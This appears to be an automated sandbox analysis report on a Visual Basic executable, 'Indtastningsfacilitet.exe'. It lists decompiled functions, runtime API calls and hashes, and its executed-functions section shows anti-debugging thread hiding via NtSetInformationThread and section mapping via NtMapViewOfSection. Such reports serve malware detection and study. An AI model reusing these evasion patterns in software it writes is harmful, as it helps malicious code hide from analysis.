                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00410D9E
                              • #588.MSVBVM60(00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410DB6
                              • __vbaNew2.MSVBVM60(00403BD8,00413744,00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410DD5
                              • __vbaObjSetAddref.MSVBVM60(?,?,00000002,00000001,00000000,?,?,?,?,004012E6), ref: 00410DF9
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403BC8,00000010,?,?,?,?,?,?,004012E6), ref: 00410E22
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004012E6), ref: 00410E33
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$#588AddrefCheckChkstkFreeHresultNew2
                              • String ID: D7A
                              • API String ID: 999118292-420359484
                              • Opcode ID: 01fe0678751d3053ed687a189de55a16443b51e1553fd14afccdbd09a18079f6
                              • Instruction ID: 4b1221a30c05aa104ada49912aec02863872e190fb4e845836b68a71ad3c4771
                              • Opcode Fuzzy Hash: 01fe0678751d3053ed687a189de55a16443b51e1553fd14afccdbd09a18079f6
                              • Instruction Fuzzy Hash: 2B11FEB0950308AFDB109F95CD46FDDBBB4EB08B05F10846AF011B61E1D7BD69819B2D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00411878, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43COMMON
                              Download Yara Rule
                              C-Code - Quality: 65%
                              			E00411878(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				short _v36;
				signed int _t15;
				short _t19;
				void* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 - 0xc;
				 *[fs:0x0] = _t29;
				L004012E0();
				_v16 = _t29;
				_v12 = 0x4012b8;
				_v8 = 0;
				_t15 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012e6, _t26);
				_push(0x403c2c);
				L00401382();
				L0040141E();
				_push(_t15);
				_push(0x403c38);
				L004013B8();
				asm("sbb eax, eax");
				_v36 =  ~( ~( ~_t15));
				L0040140C();
				_t19 = _v36;
				if(_t19 != 0) {
					_push(L"RESYNTHESIZED");
					L0040137C();
				}
				_push(0x41190e);
				return _t19;
			}













                              0x0041187b
                              0x0041188a
                              0x00411894
                              0x0041189c
                              0x0041189f
                              0x004118a6
                              0x004118b5
                              0x004118b8
                              0x004118bd
                              0x004118c7
                              0x004118cc
                              0x004118cd
                              0x004118d2
                              0x004118d9
                              0x004118df
                              0x004118e6
                              0x004118eb
                              0x004118f1
                              0x004118f3
                              0x004118f8
                              0x004118f8
                              0x004118fd
                              0x00000000

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411894
                              • #521.MSVBVM60(00403C2C,?,?,?,?,004012E6), ref: 004118BD
                              • __vbaStrMove.MSVBVM60(00403C2C,?,?,?,?,004012E6), ref: 004118C7
                              • __vbaStrCmp.MSVBVM60(00403C38,00000000,00403C2C,?,?,?,?,004012E6), ref: 004118D2
                              • __vbaFreeStr.MSVBVM60(00403C38,00000000,00403C2C,?,?,?,?,004012E6), ref: 004118E6
                              • #532.MSVBVM60(RESYNTHESIZED,00403C38,00000000,00403C2C,?,?,?,?,004012E6), ref: 004118F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$#521#532ChkstkFreeMove
                              • String ID: RESYNTHESIZED
                              • API String ID: 2085174944-2169086100
                              • Opcode ID: e7448ab17fc5dfe1654d097db5a29b0d84849d53dd106e50121bc595ca5610a6
                              • Instruction ID: 30f1080fac074f6ff74a39e39006fd12c37c1d80aad4583ae42670d0f31ce4ab
                              • Opcode Fuzzy Hash: e7448ab17fc5dfe1654d097db5a29b0d84849d53dd106e50121bc595ca5610a6
                              • Instruction Fuzzy Hash: 84014F75A40309ABDB10AFA5C842FAE7BA8AF04B44F10817BF501F75E1DA7C9501C759
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410FBC, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E00410FBC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v64;
				signed int _v68;
				char* _t36;
				signed int _t39;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t53 = _t52 - 0xc;
				 *[fs:0x0] = _t53;
				L004012E0();
				_v16 = _t53;
				_v12 = 0x401238;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4012e6, _t50);
				L00401412();
				if( *0x413010 != 0) {
					_v64 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v64 = 0x413010;
				}
				_t36 =  &_v44;
				L00401430();
				_v48 = _t36;
				_t39 =  *((intOrPtr*)( *_v48 + 0x1bc))(_v48, _t36,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x2fc))( *_v64));
				asm("fclex");
				_v52 = _t39;
				if(_v52 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x403aec);
					_push(_v48);
					_push(_v52);
					L0040145A();
					_v68 = _t39;
				}
				L0040144E();
				_push(0x4110a7);
				L0040143C();
				return _t39;
			}

















                              0x00410fbf
                              0x00410fce
                              0x00410fd8
                              0x00410fe0
                              0x00410fe3
                              0x00410fea
                              0x00410ff9
                              0x00411002
                              0x0041100e
                              0x00411028
                              0x00411010
                              0x00411010
                              0x00411015
                              0x0041101a
                              0x0041101f
                              0x0041101f
                              0x00411043
                              0x00411047
                              0x0041104c
                              0x00411057
                              0x0041105d
                              0x0041105f
                              0x00411066
                              0x00411082
                              0x00411068
                              0x00411068
                              0x0041106d
                              0x00411072
                              0x00411075
                              0x00411078
                              0x0041107d
                              0x0041107d
                              0x00411089
                              0x0041108e
                              0x004110a1
                              0x004110a6

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00410FD8
                              • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411002
                              • __vbaNew2.MSVBVM60(00402B88,00413010,?,?,?,?,004012E6), ref: 0041101A
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411047
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,000001BC), ref: 00411078
                              • __vbaFreeObj.MSVBVM60 ref: 00411089
                              • __vbaFreeVar.MSVBVM60(004110A7), ref: 004110A1
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$CheckChkstkHresultNew2
                              • String ID:
                              • API String ID: 1725699769-0
                              • Opcode ID: d6fbeeb26cd78df554238cccc5f08fef066b4039f1f01b7efa3a98d845853914
                              • Instruction ID: 92b90c9999c3301961fbf65899db47bd965ab64a376af71af8560be059c0d603
                              • Opcode Fuzzy Hash: d6fbeeb26cd78df554238cccc5f08fef066b4039f1f01b7efa3a98d845853914
                              • Instruction Fuzzy Hash: C821F570E00208AFCB00EFA5D849BDDBBB4BF08704F10806AF501BB2B1C7799985DB59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00411457, Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E00411457(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a12, void* _a32, signed int* _a60) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				char _v44;
				signed int* _t19;
				char* _t22;
				void* _t29;
				void* _t31;
				long long* _t32;

				_t32 = _t31 - 0xc;
				 *[fs:0x0] = _t32;
				L004012E0();
				_v16 = _t32;
				_v12 = 0x401278;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4012e6, _t29);
				L004013EE();
				_t22 =  &_v44;
				L00401412();
				_t19 = _a60;
				 *_t19 =  *_t19 & 0x00000000;
				asm("fldz");
				_push(_t22);
				_push(_t22);
				 *_t32 = __fp0;
				L004013D6();
				L004013DC();
				asm("fcomp qword [0x401200]");
				asm("wait");
				_push(0x4114ec);
				L0040140C();
				L0040143C();
				return _t19;
			}













                              0x0041145a
                              0x00411469
                              0x00411473
                              0x0041147b
                              0x0041147e
                              0x00411485
                              0x00411494
                              0x0041149d
                              0x004114a5
                              0x004114a8
                              0x004114ad
                              0x004114b0
                              0x004114b3
                              0x004114b5
                              0x004114b6
                              0x004114b7
                              0x004114ba
                              0x004114bf
                              0x004114c4
                              0x004114ca
                              0x004114cb
                              0x004114de
                              0x004114e6
                              0x004114eb

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411473
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 0041149D
                              • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 004114A8
                              • #586.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 004114BA
                              • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 004114BF
                              • __vbaFreeStr.MSVBVM60(004114EC,?,?,?,?,?,?,004012E6), ref: 004114DE
                              • __vbaFreeVar.MSVBVM60(004114EC,?,?,?,?,?,?,004012E6), ref: 004114E6
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$#586ChkstkCopy
                              • String ID:
                              • API String ID: 2927221586-0
                              • Opcode ID: 757d77e195acdbbc4b7ebffeebe8f25b3af39a56dcbe55dc78527dfd1b484bfd
                              • Instruction ID: b8d3dc0fdb70dd62c3493092a03649e0178a4972190101d3b5f1ff7444970679
                              • Opcode Fuzzy Hash: 757d77e195acdbbc4b7ebffeebe8f25b3af39a56dcbe55dc78527dfd1b484bfd
                              • Instruction Fuzzy Hash: F301E974500209EBDB01EF96C986B9E7BB4FF04748F40856AF401B71F1DBB89945CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00411937, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                              Download Yara Rule
                              C-Code - Quality: 67%
                              			E00411937(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				short _v36;
				signed int _t16;
				short _t20;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t30 = _t29 - 0xc;
				 *[fs:0x0] = _t30;
				L004012E0();
				_v16 = _t30;
				_v12 = 0x4012c8;
				_v8 = 0;
				_t16 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012e6, _t27);
				_push(0x403c60);
				L00401376();
				L0040141E();
				_push(_t16);
				_push(0x403c68);
				L004013B8();
				asm("sbb eax, eax");
				_v36 =  ~( ~( ~_t16));
				L0040140C();
				_t20 = _v36;
				if(_t20 != 0) {
					_push(0x2f);
					L00401370();
					_v28 = _t20;
				}
				_push(0x4119cd);
				return _t20;
			}














                              0x0041193a
                              0x00411949
                              0x00411953
                              0x0041195b
                              0x0041195e
                              0x00411965
                              0x00411974
                              0x00411977
                              0x0041197c
                              0x00411986
                              0x0041198b
                              0x0041198c
                              0x00411991
                              0x00411998
                              0x0041199e
                              0x004119a5
                              0x004119aa
                              0x004119b0
                              0x004119b2
                              0x004119b4
                              0x004119b9
                              0x004119b9
                              0x004119bc
                              0x00000000

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411953
                              • #527.MSVBVM60(00403C60,?,?,?,?,004012E6), ref: 0041197C
                              • __vbaStrMove.MSVBVM60(00403C60,?,?,?,?,004012E6), ref: 00411986
                              • __vbaStrCmp.MSVBVM60(00403C68,00000000,00403C60,?,?,?,?,004012E6), ref: 00411991
                              • __vbaFreeStr.MSVBVM60(00403C68,00000000,00403C60,?,?,?,?,004012E6), ref: 004119A5
                              • #569.MSVBVM60(0000002F,00403C68,00000000,00403C60,?,?,?,?,004012E6), ref: 004119B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$#527#569ChkstkFreeMove
                              • String ID:
                              • API String ID: 1161317979-0
                              • Opcode ID: 0dbdf54acc6402b9936e2f2560d1ec91d681b4f930a2e167f7d05a5e3ac7e47d
                              • Instruction ID: 5977d922b79fc0a1c26ab31574dc89c1b8c1c94ec1f2f164ff8bda053044e64e
                              • Opcode Fuzzy Hash: 0dbdf54acc6402b9936e2f2560d1ec91d681b4f930a2e167f7d05a5e3ac7e47d
                              • Instruction Fuzzy Hash: 78017174A40249ABDB00AFA5C846FAE7BB8AF04B40F10817AF501F71F1DB7C5900C759
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00411515, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                              Download Yara Rule
                              C-Code - Quality: 51%
                              			E00411515(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x4012e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x20);
				L004012E0();
				_v12 = _t40;
				_v8 = 0x401288;
				if( *0x413010 != 0) {
					_v48 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b88);
					L0040142A();
					_v48 = 0x413010;
				}
				_t26 =  &_v32;
				L00401430();
				_v36 = _t26;
				_t29 =  *((intOrPtr*)( *_v36 + 0x1a8))(_v36, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x300))( *_v48));
				asm("fclex");
				_v40 = _t29;
				if(_v40 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x1a8);
					_push(0x403aec);
					_push(_v36);
					_push(_v40);
					L0040145A();
					_v52 = _t29;
				}
				L0040144E();
				asm("wait");
				_push(0x4115db);
				return _t29;
			}













                              0x0041151a
                              0x00411525
                              0x00411526
                              0x0041152d
                              0x00411530
                              0x00411538
                              0x0041153b
                              0x00411549
                              0x00411563
                              0x0041154b
                              0x0041154b
                              0x00411550
                              0x00411555
                              0x0041155a
                              0x0041155a
                              0x0041157e
                              0x00411582
                              0x00411587
                              0x00411592
                              0x00411598
                              0x0041159a
                              0x004115a1
                              0x004115bd
                              0x004115a3
                              0x004115a3
                              0x004115a8
                              0x004115ad
                              0x004115b0
                              0x004115b3
                              0x004115b8
                              0x004115b8
                              0x004115c4
                              0x004115c9
                              0x004115ca
                              0x00000000

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411530
                              • __vbaNew2.MSVBVM60(00402B88,00413010,?,?,?,?,004012E6), ref: 00411555
                              • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004012E6), ref: 00411582
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AEC,000001A8,?,?,?,?,?,?,?,?,004012E6), ref: 004115B3
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004012E6), ref: 004115C4
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckChkstkFreeHresultNew2
                              • String ID:
                              • API String ID: 4127847336-0
                              • Opcode ID: 4755c5787e2ca71833929e9599610b3388b0f10ff1664664ad57ade8f2cc676c
                              • Instruction ID: 141de5ea9065e0e6ce94e05f51154663660a55e55b2aaf88cdb55441bc012582
                              • Opcode Fuzzy Hash: 4755c5787e2ca71833929e9599610b3388b0f10ff1664664ad57ade8f2cc676c
                              • Instruction Fuzzy Hash: 2711D670A40208AFCB00DF95C849BDEBBF9FB49705F10856AF502B72A1C7795941DB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410CF3, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                              Download Yara Rule
                              C-Code - Quality: 62%
                              			E00410CF3(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				char _v40;
				void* _t14;
				char* _t16;
				void* _t21;
				void* _t23;
				long long* _t24;

				_t24 = _t23 - 0xc;
				 *[fs:0x0] = _t24;
				L004012E0();
				_v16 = _t24;
				_v12 = 0x401208;
				_v8 = 0;
				_t14 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x18,  *[fs:0x0], 0x4012e6, _t21);
				_t16 =  &_v40;
				L00401412();
				asm("fldz");
				_push(_t16);
				_push(_t16);
				 *_t24 = __fp0;
				L004013D6();
				L004013DC();
				asm("fcomp qword [0x401200]");
				asm("wait");
				_push(0x410d64);
				L0040143C();
				return _t14;
			}












                              0x00410cf6
                              0x00410d05
                              0x00410d0f
                              0x00410d17
                              0x00410d1a
                              0x00410d21
                              0x00410d30
                              0x00410d36
                              0x00410d39
                              0x00410d3e
                              0x00410d40
                              0x00410d41
                              0x00410d42
                              0x00410d45
                              0x00410d4a
                              0x00410d4f
                              0x00410d55
                              0x00410d56
                              0x00410d5e
                              0x00410d63

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00410D0F
                              • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00410D39
                              • #586.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 00410D45
                              • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 00410D4A
                              • __vbaFreeVar.MSVBVM60(00410D64,?,?,?,?,?,?,004012E6), ref: 00410D5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$#586ChkstkFree
                              • String ID:
                              • API String ID: 1198234147-0
                              • Opcode ID: 2979d25d9359b1b878916a8f3bb312ae3e32be40a80ff4c918789e3522bda11b
                              • Instruction ID: 1a7bc030ebf7587da01a412675f9a9724109e256593a2e31ea619ecfbe298785
                              • Opcode Fuzzy Hash: 2979d25d9359b1b878916a8f3bb312ae3e32be40a80ff4c918789e3522bda11b
                              • Instruction Fuzzy Hash: 74F04F70900209ABCB00EF95C946F9DBBB8EF04744F5085AEF400B71B1DBB85A44CB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00411297, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E00411297(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v40;
				char _v48;
				char* _t18;
				void* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 - 0xc;
				 *[fs:0x0] = _t29;
				L004012E0();
				_v16 = _t29;
				_v12 = 0x401258;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x4012e6, _t26);
				_v40 = 2;
				_v48 = 2;
				_t18 =  &_v48;
				_push(_t18);
				L004013A0();
				L0040141E();
				L0040143C();
				_push(0x411319);
				L0040140C();
				return _t18;
			}













                              0x0041129a
                              0x004112a9
                              0x004112b3
                              0x004112bb
                              0x004112be
                              0x004112c5
                              0x004112d4
                              0x004112d7
                              0x004112de
                              0x004112e5
                              0x004112e8
                              0x004112e9
                              0x004112f3
                              0x004112fb
                              0x00411300
                              0x00411313
                              0x00411318

                              APIs
                              • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004112B3
                              • #536.MSVBVM60(00000002), ref: 004112E9
                              • __vbaStrMove.MSVBVM60(00000002), ref: 004112F3
                              • __vbaFreeVar.MSVBVM60(00000002), ref: 004112FB
                              • __vbaFreeStr.MSVBVM60(00411319,00000002), ref: 00411313
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$#536ChkstkMove
                              • String ID:
                              • API String ID: 2104488870-0
                              • Opcode ID: a06bec86a82a5f16c1d96ca68f77de029e2ad1825db8d28dddd640dae47002a9
                              • Instruction ID: 4d321259791dfa57a119b31b5129d112536a7f868503c4ff69dc4053ffe8a91f
                              • Opcode Fuzzy Hash: a06bec86a82a5f16c1d96ca68f77de029e2ad1825db8d28dddd640dae47002a9
                              • Instruction Fuzzy Hash: 92013174900208ABDB00EFA5C886BDEBBB8AF04744F50806AF501B75A1D77C9945CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Analysis Process: Indtastningsfacilitet.exe PID: 5412 Parent PID: 7092 Indtastningsfacilitet.exeCOMMON

                              Executed Functions

                              Function 021412DE, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 206nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0214074C), ref: 02140A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: W.E$1.!T$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 4046476035-3275326604
                              • Opcode ID: 0c25f4cd9abb880cbf678008b4acfff4649b59cc02456b895c5b82e314590e8b
                              • Instruction ID: 211956df8fe44127365bc8b09c30d0d9a60ff8d64705c594b909673e673cc2c8
                              • Opcode Fuzzy Hash: 0c25f4cd9abb880cbf678008b4acfff4649b59cc02456b895c5b82e314590e8b
                              • Instruction Fuzzy Hash: C6715676580304AFDB14CF20DE49B947726FF69764F104365FA1C2B2E9CBB858828F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021408B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • EnumWindows.USER32(021408D9,?,00000000,?,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021408BF
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0214074C), ref: 02140A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: EnumInformationThreadWindows
                              • String ID: 1.!T
                              • API String ID: 1954852945-3147410236
                              • Opcode ID: 497ae8d7dd8f3aebc14dc070877f9642268c13d40b4bc8e82ba561fdf277398e
                              • Instruction ID: 0b2107318ce6daf7ccbf649d4f060182de9d672f685e0a121de1af59fbafab21
                              • Opcode Fuzzy Hash: 497ae8d7dd8f3aebc14dc070877f9642268c13d40b4bc8e82ba561fdf277398e
                              • Instruction Fuzzy Hash: B43139756803016FEB14AF748C95BAA3BA29F59768F144219BE9C5B2C0CF74DC02CF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02148CF3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021493D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02149110
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction ID: 61692661e4cefbfb087eb766059e34f53f4175e88351ebbf765b9102ce6d40f9
                              • Opcode Fuzzy Hash: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction Fuzzy Hash: 2551EC33505605CFCF1CCF24EA98B69B726EF6A334F00936AD6181B1EDCB3854828B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02146DB9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: 1.!T
                              • API String ID: 0-3147410236
                              • Opcode ID: f6ab0dbb56da944bc9757293bed84c656bc5037f37e2ff443a4661029efe5e72
                              • Instruction ID: 1f24a79b4434348d25cc604953e7e3fcf12b0c648570a048cd9751ac4ff76e3c
                              • Opcode Fuzzy Hash: f6ab0dbb56da944bc9757293bed84c656bc5037f37e2ff443a4661029efe5e72
                              • Instruction Fuzzy Hash: 8F41BB75A80315AFEB14DF68CD90B9A77A1AF49758F168129FD5C6B380CB30EC01CA84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02148DF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021493D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02149110
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction ID: 4d00c90e284b6607fb8bb58d260857480e5b26f01c4c7619446c40bae9b4ff26
                              • Opcode Fuzzy Hash: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction Fuzzy Hash: 3551BA33405605DFCF1CCF24EA98B6AB726EF6A334F00936AD1180B1EDDB7855828B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021408EF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115nativethreadCOMMON
                              Download Yara Rule
                              APIs
